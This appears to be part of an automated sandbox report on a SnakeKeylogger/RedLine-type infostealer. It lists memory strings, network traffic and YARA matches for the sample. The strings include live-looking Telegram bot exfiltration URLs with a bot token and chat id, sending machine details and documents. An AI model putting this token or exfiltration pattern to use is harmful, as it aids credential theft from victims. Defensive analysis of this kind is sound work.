              Source: svchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: svchost.exe, 00000003.00000002.4473198929.0000000005275000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.00000000052F0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005696000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000056F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
              Source: svchost.exe, 00000006.00000002.4473666032.00000000056F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: svchost.exe, 00000003.00000002.4473198929.0000000005275000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005696000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
              Source: svchost.exe, 00000003.00000002.4473198929.0000000005275000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005696000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20a
              Source: svchost.exe, 00000006.00000002.4473666032.00000000056F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI/sendDocument?chat_id=6443
              Source: svchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: svchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: svchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: svchost.exe, 00000006.00000002.4473666032.0000000005718000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
              Source: svchost.exe, 00000006.00000002.4473666032.0000000005713000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
              Source: svchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: svchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: svchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: svchost.exe, 00000003.00000002.4473198929.000000000524E000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.0000000005275000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.00000000051DE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005670000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000055EE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005696000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
              Source: svchost.exe, 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.00000000051DE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000055EE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
              Source: svchost.exe, 00000006.00000002.4473666032.000000000565C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
              Source: svchost.exe, 00000003.00000002.4473198929.000000000524E000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.0000000005275000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.0000000005208000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005670000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005617000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005696000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.000000000565C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
              Source: svchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: svchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: svchost.exe, 00000006.00000002.4473666032.0000000005749000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.000000000573A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
              Source: svchost.exe, 00000003.00000002.4473198929.0000000005337000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49749 version: TLS 1.2
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C6EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00C6EAFF
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C6ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00C6ED6A
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00EDED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_00EDED6A
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C6EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00C6EAFF
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C5AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_00C5AA57
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C89576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00C89576
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00EF9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_00EF9576

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 3.3.svchost.exe.305af20.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.3.svchost.exe.305af20.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.3.svchost.exe.305af20.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 6.3.svchost.exe.346f000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 6.3.svchost.exe.346f000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 6.3.svchost.exe.346f000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 2.2.chordates.exe.3a90000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 3.2.svchost.exe.7730000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.svchost.exe.7730000.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.svchost.exe.7730000.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 6.2.svchost.exe.7b40000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 6.2.svchost.exe.7b40000.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 6.2.svchost.exe.7b40000.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 3.2.svchost.exe.7730f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.svchost.exe.7730f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.svchost.exe.7730f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 6.2.svchost.exe.7f00000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 6.2.svchost.exe.7f00000.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 6.2.svchost.exe.7f00000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 3.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 6.2.svchost.exe.7b40000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 6.2.svchost.exe.7b40000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 6.2.svchost.exe.7b40000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 6.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 6.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 6.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 3.3.svchost.exe.305af20.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.3.svchost.exe.305af20.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.3.svchost.exe.305af20.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 6.2.svchost.exe.7b40f20.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 6.2.svchost.exe.7b40f20.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 6.2.svchost.exe.7b40f20.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 6.3.svchost.exe.346f000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 6.3.svchost.exe.346f000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 6.3.svchost.exe.346f000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 5.2.chordates.exe.13e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 6.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 6.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 6.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 3.2.svchost.exe.7730f20.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.svchost.exe.7730f20.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.svchost.exe.7730f20.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 3.3.svchost.exe.305a000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.3.svchost.exe.305a000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.3.svchost.exe.305a000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 6.2.svchost.exe.7b40f20.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 6.2.svchost.exe.7b40f20.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 6.2.svchost.exe.7b40f20.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 3.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 6.2.svchost.exe.7f00000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 6.2.svchost.exe.7f00000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 6.2.svchost.exe.7f00000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 3.2.svchost.exe.7730000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.svchost.exe.7730000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.svchost.exe.7730000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 6.3.svchost.exe.346ff20.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 6.3.svchost.exe.346ff20.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 6.3.svchost.exe.346ff20.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 3.3.svchost.exe.305a000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.3.svchost.exe.305a000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.3.svchost.exe.305a000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 6.3.svchost.exe.346ff20.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 6.3.svchost.exe.346ff20.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 6.3.svchost.exe.346ff20.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000006.00000002.4470352706.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000002.00000002.2040744990.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000003.00000002.4470368288.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
